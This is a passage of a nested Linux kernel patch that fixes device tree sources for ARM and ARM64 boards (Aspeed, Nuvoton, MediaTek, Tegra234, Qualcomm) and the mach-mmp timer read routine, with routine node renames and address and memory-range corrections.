++				assigned-addresses = <0x82004800 0 0x42000 0 0x2000>;
+ 				reg = <0x4800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
+index a6a2bc3b855c2..fcc890e3ad735 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
+@@ -162,16 +162,9 @@
+ 		#size-cells = <1>;
+ 		ranges;
+ 
+-		/* LPC FW cycle bridge region requires natural alignment */
+-		flash_memory: region@b8000000 {
+-			no-map;
+-			reg = <0xb8000000 0x04000000>; /* 64M */
+-		};
+-
+-		/* 48MB region from the end of flash to start of vga memory */
+-		ramoops@bc000000 {
++		ramoops@b3e00000 {
+ 			compatible = "ramoops";
+-			reg = <0xbc000000 0x200000>; /* 16 * (4 * 0x8000) */
++			reg = <0xb3e00000 0x200000>; /* 16 * (4 * 0x8000) */
+ 			record-size = <0x8000>;
+ 			console-size = <0x8000>;
+ 			ftrace-size = <0x8000>;
+@@ -179,6 +172,12 @@
+ 			max-reason = <3>; /* KMSG_DUMP_EMERG */
+ 		};
+ 
++		/* LPC FW cycle bridge region requires natural alignment */
++		flash_memory: region@b4000000 {
++			no-map;
++			reg = <0xb4000000 0x04000000>; /* 64M */
++		};
++
+ 		/* VGA region is dictated by hardware strapping */
+ 		vga_memory: region@bf000000 {
+ 			no-map;
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
+index bf59a9962379d..4879da4cdbd25 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
+@@ -95,14 +95,9 @@
+ 		#size-cells = <1>;
+ 		ranges;
+ 
+-		flash_memory: region@b8000000 {
+-			no-map;
+-			reg = <0xb8000000 0x04000000>; /* 64M */
+-		};
+-
+-		ramoops@bc000000 {
++		ramoops@b3e00000 {
+ 			compatible = "ramoops";
+-			reg = <0xbc000000 0x200000>; /* 16 * (4 * 0x8000) */
++			reg = <0xb3e00000 0x200000>; /* 16 * (4 * 0x8000) */
+ 			record-size = <0x8000>;
+ 			console-size = <0x8000>;
+ 			ftrace-size = <0x8000>;
+@@ -110,6 +105,13 @@
+ 			max-reason = <3>; /* KMSG_DUMP_EMERG */
+ 		};
+ 
++		/* LPC FW cycle bridge region requires natural alignment */
++		flash_memory: region@b4000000 {
++			no-map;
++			reg = <0xb4000000 0x04000000>; /* 64M */
++		};
++
++		/* VGA region is dictated by hardware strapping */
+ 		vga_memory: region@bf000000 {
+ 			no-map;
+ 			compatible = "shared-dma-pool";
+diff --git a/arch/arm/boot/dts/dove.dtsi b/arch/arm/boot/dts/dove.dtsi
+index 00a36fba2fd23..9aee3cfd3e981 100644
+--- a/arch/arm/boot/dts/dove.dtsi
++++ b/arch/arm/boot/dts/dove.dtsi
+@@ -139,7 +139,7 @@
+ 			pcie1: pcie@2 {
+ 				device_type = "pci";
+ 				status = "disabled";
+-				assigned-addresses = <0x82002800 0 0x80000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x80000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				clocks = <&gate_clk 5>;
+ 				marvell,pcie-port = <1>;
+diff --git a/arch/arm/boot/dts/nuvoton-npcm730-gbs.dts b/arch/arm/boot/dts/nuvoton-npcm730-gbs.dts
+index d10669fcd527d..9e9eba8bad5e4 100644
+--- a/arch/arm/boot/dts/nuvoton-npcm730-gbs.dts
++++ b/arch/arm/boot/dts/nuvoton-npcm730-gbs.dts
+@@ -366,7 +366,7 @@
+ 		spi-max-frequency = <20000000>;
+ 		spi-rx-bus-width = <2>;
+ 		label = "bmc";
+-		partitions@80000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+diff --git a/arch/arm/boot/dts/nuvoton-npcm730-gsj.dts b/arch/arm/boot/dts/nuvoton-npcm730-gsj.dts
+index 491606c4f044d..2a394cc15284c 100644
+--- a/arch/arm/boot/dts/nuvoton-npcm730-gsj.dts
++++ b/arch/arm/boot/dts/nuvoton-npcm730-gsj.dts
+@@ -142,7 +142,7 @@
+ 		reg = <0>;
+ 		spi-rx-bus-width = <2>;
+ 
+-		partitions@80000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+diff --git a/arch/arm/boot/dts/nuvoton-npcm730-kudo.dts b/arch/arm/boot/dts/nuvoton-npcm730-kudo.dts
+index a0c2d76526258..f7b38bee039bc 100644
+--- a/arch/arm/boot/dts/nuvoton-npcm730-kudo.dts
++++ b/arch/arm/boot/dts/nuvoton-npcm730-kudo.dts
+@@ -388,7 +388,7 @@
+ 		spi-max-frequency = <5000000>;
+ 		spi-rx-bus-width = <2>;
+ 		label = "bmc";
+-		partitions@80000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+@@ -422,7 +422,7 @@
+ 		reg = <1>;
+ 		spi-max-frequency = <5000000>;
+ 		spi-rx-bus-width = <2>;
+-		partitions@88000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+@@ -447,7 +447,7 @@
+ 		reg = <0>;
+ 		spi-max-frequency = <5000000>;
+ 		spi-rx-bus-width = <2>;
+-		partitions@A0000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+diff --git a/arch/arm/boot/dts/nuvoton-npcm750-evb.dts b/arch/arm/boot/dts/nuvoton-npcm750-evb.dts
+index 3dad32834e5ea..f53d45fa1de87 100644
+--- a/arch/arm/boot/dts/nuvoton-npcm750-evb.dts
++++ b/arch/arm/boot/dts/nuvoton-npcm750-evb.dts
+@@ -74,7 +74,7 @@
+ 		spi-rx-bus-width = <2>;
+ 		reg = <0>;
+ 		spi-max-frequency = <5000000>;
+-		partitions@80000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+@@ -135,7 +135,7 @@
+ 		spi-rx-bus-width = <2>;
+ 		reg = <0>;
+ 		spi-max-frequency = <5000000>;
+-		partitions@A0000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+diff --git a/arch/arm/boot/dts/nuvoton-npcm750-runbmc-olympus.dts b/arch/arm/boot/dts/nuvoton-npcm750-runbmc-olympus.dts
+index 132e702281fc5..87359ab05db3e 100644
+--- a/arch/arm/boot/dts/nuvoton-npcm750-runbmc-olympus.dts
++++ b/arch/arm/boot/dts/nuvoton-npcm750-runbmc-olympus.dts
+@@ -107,7 +107,7 @@
+ 		reg = <0>;
+ 		spi-rx-bus-width = <2>;
+ 
+-		partitions@80000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+@@ -146,7 +146,7 @@
+ 		reg = <1>;
+ 		npcm,fiu-rx-bus-width = <2>;
+ 
+-		partitions@88000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+@@ -173,7 +173,7 @@
+ 		reg = <0>;
+ 		spi-rx-bus-width = <2>;
+ 
+-		partitions@A0000000 {
++		partitions {
+ 			compatible = "fixed-partitions";
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+diff --git a/arch/arm/boot/dts/qcom-apq8064.dtsi b/arch/arm/boot/dts/qcom-apq8064.dtsi
+index 942aa2278355d..a39b940d58532 100644
+--- a/arch/arm/boot/dts/qcom-apq8064.dtsi
++++ b/arch/arm/boot/dts/qcom-apq8064.dtsi
+@@ -1615,7 +1615,7 @@
+ 		};
+ 
+ 		etb@1a01000 {
+-			compatible = "coresight-etb10", "arm,primecell";
++			compatible = "arm,coresight-etb10", "arm,primecell";
+ 			reg = <0x1a01000 0x1000>;
+ 
+ 			clocks = <&rpmcc RPM_QDSS_CLK>;
+diff --git a/arch/arm/boot/dts/spear600.dtsi b/arch/arm/boot/dts/spear600.dtsi
+index fd41243a0b2c0..9d5a04a46b14e 100644
+--- a/arch/arm/boot/dts/spear600.dtsi
++++ b/arch/arm/boot/dts/spear600.dtsi
+@@ -47,7 +47,7 @@
+ 			compatible = "arm,pl110", "arm,primecell";
+ 			reg = <0xfc200000 0x1000>;
+ 			interrupt-parent = <&vic1>;
+-			interrupts = <12>;
++			interrupts = <13>;
+ 			status = "disabled";
+ 		};
+ 
+diff --git a/arch/arm/boot/dts/stm32mp157a-dhcor-avenger96.dts b/arch/arm/boot/dts/stm32mp157a-dhcor-avenger96.dts
+index 2e3c9fbb4eb36..275167f26fd9d 100644
+--- a/arch/arm/boot/dts/stm32mp157a-dhcor-avenger96.dts
++++ b/arch/arm/boot/dts/stm32mp157a-dhcor-avenger96.dts
+@@ -13,7 +13,6 @@
+ /dts-v1/;
+ 
+ #include "stm32mp157.dtsi"
+-#include "stm32mp15xc.dtsi"
+ #include "stm32mp15xx-dhcor-som.dtsi"
+ #include "stm32mp15xx-dhcor-avenger96.dtsi"
+ 
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
+index 90933077d66de..b6957cbdeff5f 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
+@@ -100,7 +100,7 @@
+ 		regulator-min-microvolt = <3300000>;
+ 		regulator-max-microvolt = <3300000>;
+ 
+-		gpios = <&gpioz 3 GPIO_ACTIVE_HIGH>;
++		gpio = <&gpioz 3 GPIO_ACTIVE_HIGH>;
+ 		enable-active-high;
+ 	};
+ };
+diff --git a/arch/arm/mach-mmp/time.c b/arch/arm/mach-mmp/time.c
+index 41b2e8abc9e69..708816caf859c 100644
+--- a/arch/arm/mach-mmp/time.c
++++ b/arch/arm/mach-mmp/time.c
+@@ -43,18 +43,21 @@
+ static void __iomem *mmp_timer_base = TIMERS_VIRT_BASE;
+ 
+ /*
+- * FIXME: the timer needs some delay to stablize the counter capture
++ * Read the timer through the CVWR register. Delay is required after requesting
++ * a read. The CR register cannot be directly read due to metastability issues
++ * documented in the PXA168 software manual.
+  */
+ static inline uint32_t timer_read(void)
+ {
+-	int delay = 100;
++	uint32_t val;
++	int delay = 3;
+ 
+ 	__raw_writel(1, mmp_timer_base + TMR_CVWR(1));
+ 
+ 	while (delay--)
+-		cpu_relax();
++		val = __raw_readl(mmp_timer_base + TMR_CVWR(1));
+ 
+-	return __raw_readl(mmp_timer_base + TMR_CVWR(1));
++	return val;
+ }
+ 
+ static u64 notrace mmp_read_sched_clock(void)
+diff --git a/arch/arm64/boot/dts/apple/t8103.dtsi b/arch/arm64/boot/dts/apple/t8103.dtsi
+index 51a63b29d4045..a4d195e9eb8c8 100644
+--- a/arch/arm64/boot/dts/apple/t8103.dtsi
++++ b/arch/arm64/boot/dts/apple/t8103.dtsi
+@@ -412,7 +412,7 @@
+ 			resets = <&ps_ans2>;
+ 		};
+ 
+-		pcie0_dart_0: dart@681008000 {
++		pcie0_dart_0: iommu@681008000 {
+ 			compatible = "apple,t8103-dart";
+ 			reg = <0x6 0x81008000 0x0 0x4000>;
+ 			#iommu-cells = <1>;
+@@ -421,7 +421,7 @@
+ 			power-domains = <&ps_apcie_gp>;
+ 		};
+ 
+-		pcie0_dart_1: dart@682008000 {
++		pcie0_dart_1: iommu@682008000 {
+ 			compatible = "apple,t8103-dart";
+ 			reg = <0x6 0x82008000 0x0 0x4000>;
+ 			#iommu-cells = <1>;
+@@ -430,7 +430,7 @@
+ 			power-domains = <&ps_apcie_gp>;
+ 		};
+ 
+-		pcie0_dart_2: dart@683008000 {
++		pcie0_dart_2: iommu@683008000 {
+ 			compatible = "apple,t8103-dart";
+ 			reg = <0x6 0x83008000 0x0 0x4000>;
+ 			#iommu-cells = <1>;
+diff --git a/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts b/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts
+index ada164d423f3d..200f97e1c4c9c 100644
+--- a/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts
++++ b/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts
+@@ -125,9 +125,12 @@
+ 	/delete-property/ mrvl,i2c-fast-mode;
+ 	status = "okay";
+ 
++	/* MCP7940MT-I/MNY RTC */
+ 	rtc@6f {
+ 		compatible = "microchip,mcp7940x";
+ 		reg = <0x6f>;
++		interrupt-parent = <&gpiosb>;
++		interrupts = <5 0>; /* GPIO2_5 */
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt2712-evb.dts b/arch/arm64/boot/dts/mediatek/mt2712-evb.dts
+index 9b1af9c801308..d31a194124c91 100644
+--- a/arch/arm64/boot/dts/mediatek/mt2712-evb.dts
++++ b/arch/arm64/boot/dts/mediatek/mt2712-evb.dts
+@@ -26,14 +26,14 @@
+ 		stdout-path = "serial0:921600n8";
+ 	};
+ 
+-	cpus_fixed_vproc0: fixedregulator@0 {
++	cpus_fixed_vproc0: regulator-vproc-buck0 {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "vproc_buck0";
+ 		regulator-min-microvolt = <1000000>;
+ 		regulator-max-microvolt = <1000000>;
+ 	};
+ 
+-	cpus_fixed_vproc1: fixedregulator@1 {
++	cpus_fixed_vproc1: regulator-vproc-buck1 {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "vproc_buck1";
+ 		regulator-min-microvolt = <1000000>;
+@@ -50,7 +50,7 @@
+ 		id-gpio = <&pio 14 GPIO_ACTIVE_HIGH>;
+ 	};
+ 
+-	usb_p0_vbus: regulator@2 {
++	usb_p0_vbus: regulator-usb-p0-vbus {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "p0_vbus";
+ 		regulator-min-microvolt = <5000000>;
+@@ -59,7 +59,7 @@
+ 		enable-active-high;
+ 	};
+ 
+-	usb_p1_vbus: regulator@3 {
++	usb_p1_vbus: regulator-usb-p1-vbus {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "p1_vbus";
+ 		regulator-min-microvolt = <5000000>;
+@@ -68,7 +68,7 @@
+ 		enable-active-high;
+ 	};
+ 
+-	usb_p2_vbus: regulator@4 {
++	usb_p2_vbus: regulator-usb-p2-vbus {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "p2_vbus";
+ 		regulator-min-microvolt = <5000000>;
+@@ -77,7 +77,7 @@
+ 		enable-active-high;
+ 	};
+ 
+-	usb_p3_vbus: regulator@5 {
++	usb_p3_vbus: regulator-usb-p3-vbus {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "p3_vbus";
+ 		regulator-min-microvolt = <5000000>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt2712e.dtsi b/arch/arm64/boot/dts/mediatek/mt2712e.dtsi
+index e6d7453e56e0e..1ac0b2cf3d406 100644
+--- a/arch/arm64/boot/dts/mediatek/mt2712e.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt2712e.dtsi
+@@ -160,70 +160,70 @@
+ 		#clock-cells = <0>;
+ 	};
+ 
+-	clk26m: oscillator@0 {
++	clk26m: oscillator-26m {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <26000000>;
+ 		clock-output-names = "clk26m";
+ 	};
+ 
+-	clk32k: oscillator@1 {
++	clk32k: oscillator-32k {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <32768>;
+ 		clock-output-names = "clk32k";
+ 	};
+ 
+-	clkfpc: oscillator@2 {
++	clkfpc: oscillator-50m {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <50000000>;
+ 		clock-output-names = "clkfpc";
+ 	};
+ 
+-	clkaud_ext_i_0: oscillator@3 {
++	clkaud_ext_i_0: oscillator-aud0 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <6500000>;
+ 		clock-output-names = "clkaud_ext_i_0";
+ 	};
+ 
+-	clkaud_ext_i_1: oscillator@4 {
++	clkaud_ext_i_1: oscillator-aud1 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <196608000>;
+ 		clock-output-names = "clkaud_ext_i_1";
+ 	};
+ 
+-	clkaud_ext_i_2: oscillator@5 {
++	clkaud_ext_i_2: oscillator-aud2 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <180633600>;
+ 		clock-output-names = "clkaud_ext_i_2";
+ 	};
+ 
+-	clki2si0_mck_i: oscillator@6 {
++	clki2si0_mck_i: oscillator-i2s0 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <30000000>;
+ 		clock-output-names = "clki2si0_mck_i";
+ 	};
+ 
+-	clki2si1_mck_i: oscillator@7 {
++	clki2si1_mck_i: oscillator-i2s1 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <30000000>;
+ 		clock-output-names = "clki2si1_mck_i";
+ 	};
+ 
+-	clki2si2_mck_i: oscillator@8 {
++	clki2si2_mck_i: oscillator-i2s2 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <30000000>;
+ 		clock-output-names = "clki2si2_mck_i";
+ 	};
+ 
+-	clktdmin_mclk_i: oscillator@9 {
++	clktdmin_mclk_i: oscillator-mclk {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <30000000>;
+@@ -266,7 +266,7 @@
+ 		reg = <0 0x10005000 0 0x1000>;
+ 	};
+ 
+-	pio: pinctrl@10005000 {
++	pio: pinctrl@1000b000 {
+ 		compatible = "mediatek,mt2712-pinctrl";
+ 		reg = <0 0x1000b000 0 0x1000>;
+ 		mediatek,pctl-regmap = <&syscfg_pctl_a>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt6779.dtsi b/arch/arm64/boot/dts/mediatek/mt6779.dtsi
+index 9bdf5145966c5..dde9ce137b4f1 100644
+--- a/arch/arm64/boot/dts/mediatek/mt6779.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt6779.dtsi
+@@ -88,14 +88,14 @@
+ 		interrupts = <GIC_PPI 7 IRQ_TYPE_LEVEL_LOW 0>;
+ 	};
+ 
+-	clk26m: oscillator@0 {
++	clk26m: oscillator-26m {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <26000000>;
+ 		clock-output-names = "clk26m";
+ 	};
+ 
+-	clk32k: oscillator@1 {
++	clk32k: oscillator-32k {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <32768>;
+@@ -117,7 +117,7 @@
+ 		compatible = "simple-bus";
+ 		ranges;
+ 
+-		gic: interrupt-controller@0c000000 {
++		gic: interrupt-controller@c000000 {
+ 			compatible = "arm,gic-v3";
+ 			#interrupt-cells = <4>;
+ 			interrupt-parent = <&gic>;
+@@ -138,7 +138,7 @@
+ 
+ 		};
+ 
+-		sysirq: intpol-controller@0c53a650 {
++		sysirq: intpol-controller@c53a650 {
+ 			compatible = "mediatek,mt6779-sysirq",
+ 				     "mediatek,mt6577-sysirq";
+ 			interrupt-controller;
+diff --git a/arch/arm64/boot/dts/mediatek/mt6797.dtsi b/arch/arm64/boot/dts/mediatek/mt6797.dtsi
+index 15616231022a2..c3677d77e0a45 100644
+--- a/arch/arm64/boot/dts/mediatek/mt6797.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt6797.dtsi
+@@ -95,7 +95,7 @@
+ 		};
+ 	};
+ 
+-	clk26m: oscillator@0 {
++	clk26m: oscillator-26m {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <26000000>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+index 72e0d9722e07a..35e01fa2d314b 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+@@ -14,7 +14,7 @@
+ 	#address-cells = <2>;
+ 	#size-cells = <2>;
+ 
+-	clk40m: oscillator@0 {
++	clk40m: oscillator-40m {
+ 		compatible = "fixed-clock";
+ 		clock-frequency = <40000000>;
+ 		#clock-cells = <0>;
+@@ -112,6 +112,12 @@
+ 			#clock-cells = <1>;
+ 		};
+ 
++		wed_pcie: wed-pcie@10003000 {
++			compatible = "mediatek,mt7986-wed-pcie",
++				     "syscon";
++			reg = <0 0x10003000 0 0x10>;
++		};
++
+ 		topckgen: topckgen@1001b000 {
+ 			compatible = "mediatek,mt7986-topckgen", "syscon";
+ 			reg = <0 0x1001B000 0 0x1000>;
+@@ -168,7 +174,7 @@
+ 			#clock-cells = <1>;
+ 		};
+ 
+-		trng: trng@1020f000 {
++		trng: rng@1020f000 {
+ 			compatible = "mediatek,mt7986-rng",
+ 				     "mediatek,mt7623-rng";
+ 			reg = <0 0x1020f000 0 0x100>;
+@@ -228,12 +234,6 @@
+ 			 #reset-cells = <1>;
+ 		};
+ 
+-		wed_pcie: wed-pcie@10003000 {
+-			compatible = "mediatek,mt7986-wed-pcie",
+-				     "syscon";
+-			reg = <0 0x10003000 0 0x10>;
+-		};
+-
+ 		wed0: wed@15010000 {
+ 			compatible = "mediatek,mt7986-wed",
+ 				     "syscon";
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183.dtsi b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+index a70b669c49baa..402136bfd5350 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+@@ -1678,7 +1678,7 @@
+ 				<GIC_SPI 278 IRQ_TYPE_LEVEL_LOW>;
+ 			interrupt-names = "job", "mmu", "gpu";
+ 
+-			clocks = <&topckgen CLK_TOP_MFGPLL_CK>;
++			clocks = <&mfgcfg CLK_MFG_BG3D>;
+ 
+ 			power-domains =
+ 				<&spm MT8183_POWER_DOMAIN_MFG_CORE0>,
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index 905d1a90b406c..0b85b5874a4f9 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -36,7 +36,7 @@
+ 			enable-method = "psci";
+ 			performance-domains = <&performance 0>;
+ 			clock-frequency = <1701000000>;
+-			capacity-dmips-mhz = <578>;
++			capacity-dmips-mhz = <308>;
+ 			cpu-idle-states = <&cpu_off_l &cluster_off_l>;
+ 			next-level-cache = <&l2_0>;
+ 			#cooling-cells = <2>;
+@@ -49,7 +49,7 @@
+ 			enable-method = "psci";
+ 			performance-domains = <&performance 0>;
+ 			clock-frequency = <1701000000>;
+-			capacity-dmips-mhz = <578>;
++			capacity-dmips-mhz = <308>;
+ 			cpu-idle-states = <&cpu_off_l &cluster_off_l>;
+ 			next-level-cache = <&l2_0>;
+ 			#cooling-cells = <2>;
+@@ -62,7 +62,7 @@
+ 			enable-method = "psci";
+ 			performance-domains = <&performance 0>;
+ 			clock-frequency = <1701000000>;
+-			capacity-dmips-mhz = <578>;
++			capacity-dmips-mhz = <308>;
+ 			cpu-idle-states = <&cpu_off_l &cluster_off_l>;
+ 			next-level-cache = <&l2_0>;
+ 			#cooling-cells = <2>;
+@@ -75,7 +75,7 @@
+ 			enable-method = "psci";
+ 			performance-domains = <&performance 0>;
+ 			clock-frequency = <1701000000>;
+-			capacity-dmips-mhz = <578>;
++			capacity-dmips-mhz = <308>;
+ 			cpu-idle-states = <&cpu_off_l &cluster_off_l>;
+ 			next-level-cache = <&l2_0>;
+ 			#cooling-cells = <2>;
+diff --git a/arch/arm64/boot/dts/mediatek/pumpkin-common.dtsi b/arch/arm64/boot/dts/mediatek/pumpkin-common.dtsi
+index 8ee1529683a34..ec8dfb3d1c6d6 100644
+--- a/arch/arm64/boot/dts/mediatek/pumpkin-common.dtsi
++++ b/arch/arm64/boot/dts/mediatek/pumpkin-common.dtsi
+@@ -17,7 +17,7 @@
+ 	};
+ 
+ 	firmware {
+-		optee: optee@4fd00000 {
++		optee: optee {
+ 			compatible = "linaro,optee-tz";
+ 			method = "smc";
+ 		};
+@@ -209,7 +209,7 @@
+ 		};
+ 	};
+ 
+-	i2c0_pins_a: i2c0@0 {
++	i2c0_pins_a: i2c0 {
+ 		pins1 {
+ 			pinmux = <MT8516_PIN_58_SDA0__FUNC_SDA0_0>,
+ 				 <MT8516_PIN_59_SCL0__FUNC_SCL0_0>;
+@@ -217,7 +217,7 @@
+ 		};
+ 	};
+ 
+-	i2c2_pins_a: i2c2@0 {
++	i2c2_pins_a: i2c2 {
+ 		pins1 {
+ 			pinmux = <MT8516_PIN_60_SDA2__FUNC_SDA2_0>,
+ 				 <MT8516_PIN_61_SCL2__FUNC_SCL2_0>;
+diff --git a/arch/arm64/boot/dts/nvidia/tegra234.dtsi b/arch/arm64/boot/dts/nvidia/tegra234.dtsi
+index 0170bfa8a4679..dfe2cf2f4b218 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra234.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra234.dtsi
+@@ -1965,7 +1965,7 @@
+ 
+ 		bus-range = <0x0 0xff>;
+ 
+-		ranges = <0x43000000 0x35 0x40000000 0x35 0x40000000 0x2 0xe8000000>, /* prefetchable memory (11904 MB) */
++		ranges = <0x43000000 0x35 0x40000000 0x35 0x40000000 0x2 0xc0000000>, /* prefetchable memory (11264 MB) */
+ 			 <0x02000000 0x0  0x40000000 0x38 0x28000000 0x0 0x08000000>, /* non-prefetchable memory (128 MB) */
+ 			 <0x01000000 0x0  0x2c100000 0x00 0x2c100000 0x0 0x00100000>; /* downstream I/O (1 MB) */
+ 
+@@ -2178,7 +2178,7 @@
+ 		bus-range = <0x0 0xff>;
+ 
+ 		ranges = <0x43000000 0x21 0x00000000 0x21 0x00000000 0x0 0x28000000>, /* prefetchable memory (640 MB) */
+-			 <0x02000000 0x0  0x40000000 0x21 0xe8000000 0x0 0x08000000>, /* non-prefetchable memory (128 MB) */
++			 <0x02000000 0x0  0x40000000 0x21 0x28000000 0x0 0x08000000>, /* non-prefetchable memory (128 MB) */
+ 			 <0x01000000 0x0  0x34100000 0x00 0x34100000 0x0 0x00100000>; /* downstream I/O (1 MB) */
+ 
+ 		interconnects = <&mc TEGRA234_MEMORY_CLIENT_PCIE3R &emc>,
+@@ -2336,7 +2336,7 @@
+ 
+ 		bus-range = <0x0 0xff>;
+ 
+-		ranges = <0x43000000 0x27 0x40000000 0x27 0x40000000 0x3 0xe8000000>, /* prefetchable memory (16000 MB) */
++		ranges = <0x43000000 0x28 0x00000000 0x28 0x00000000 0x3 0x28000000>, /* prefetchable memory (12928 MB) */
+ 			 <0x02000000 0x0  0x40000000 0x2b 0x28000000 0x0 0x08000000>, /* non-prefetchable memory (128 MB) */
+ 			 <0x01000000 0x0  0x3a100000 0x00 0x3a100000 0x0 0x00100000>; /* downstream I/O (1 MB) */
+ 
+@@ -2442,7 +2442,7 @@
+ 
+ 		bus-range = <0x0 0xff>;
+ 
+-		ranges = <0x43000000 0x2e 0x40000000 0x2e 0x40000000 0x3 0xe8000000>, /* prefetchable memory (16000 MB) */
++		ranges = <0x43000000 0x30 0x00000000 0x30 0x00000000 0x2 0x28000000>, /* prefetchable memory (8832 MB) */
+ 			 <0x02000000 0x0  0x40000000 0x32 0x28000000 0x0 0x08000000>, /* non-prefetchable memory (128 MB) */
+ 			 <0x01000000 0x0  0x3e100000 0x00 0x3e100000 0x0 0x00100000>; /* downstream I/O (1 MB) */
+ 
+diff --git a/arch/arm64/boot/dts/qcom/ipq6018-cp01-c1.dts b/arch/arm64/boot/dts/qcom/ipq6018-cp01-c1.dts
+index 1ba2eca33c7b6..6a716c83e5f1d 100644
+--- a/arch/arm64/boot/dts/qcom/ipq6018-cp01-c1.dts
++++ b/arch/arm64/boot/dts/qcom/ipq6018-cp01-c1.dts
+@@ -37,6 +37,8 @@
+ 
+ &blsp1_spi1 {
+ 	cs-select = <0>;
++	pinctrl-0 = <&spi_0_pins>;
++	pinctrl-names = "default";
+ 	status = "okay";
+ 
+ 	flash@0 {
+diff --git a/arch/arm64/boot/dts/qcom/msm8916.dtsi b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+index a831064700ee8..9743cb270639d 100644
+--- a/arch/arm64/boot/dts/qcom/msm8916.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+@@ -1345,7 +1345,7 @@
+ 		};
+ 
+ 		mpss: remoteproc@4080000 {
+-			compatible = "qcom,msm8916-mss-pil", "qcom,q6v5-pil";
++			compatible = "qcom,msm8916-mss-pil";
+ 			reg = <0x04080000 0x100>,
+ 			      <0x04020000 0x040>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index aba7176443919..1107befc3b091 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
